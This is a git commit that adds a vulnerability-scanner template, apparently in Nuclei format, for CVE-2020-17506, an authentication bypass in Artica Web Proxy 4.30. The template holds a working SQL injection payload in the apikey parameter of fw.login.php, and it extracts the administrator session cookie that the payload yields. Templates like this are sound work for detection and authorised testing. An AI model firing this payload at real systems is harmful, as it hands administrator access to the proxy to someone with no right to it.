🔥 Add CVE-2020-17506

2020-08-20 22:11:34 +07:00 · 2020-08-20 22:11:34 +07:00 · 20ea5091d1
parent f571f2c0ac
commit 20ea5091d1
1 changed files with 38 additions and 0 deletions
--- a/cves/CVE-2020-17506.yaml
+++ b/cves/CVE-2020-17506.yaml
@ -0,0 +1,38 @@
+id: CVE-2020-17506
+
+info:
+  name: Artica Web Proxy 4.30 Authentication Bypass
+  author: dwisiswant0
+  severity: critical
+
+  # Artica Web Proxy 4.30.00000000
+  # allows remote attacker to bypass privilege detection
+  # and gain web backend administrator privileges
+  # through SQL injection of the apikey parameter in fw.login.php.
+  # -
+  # References:
+  # > https://blog.max0x4141.com/post/artica_proxy/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+      - "{{BaseURL}}:9000/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+    # redirects: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 301
+          - 302
+        condition: or
+      - type: word
+        words:
+          - "PHPSESSID"
+        part: header
+    extractors:
+      - type: kval
+        name: session-id
+        kval:
+          - "PHPSESSID"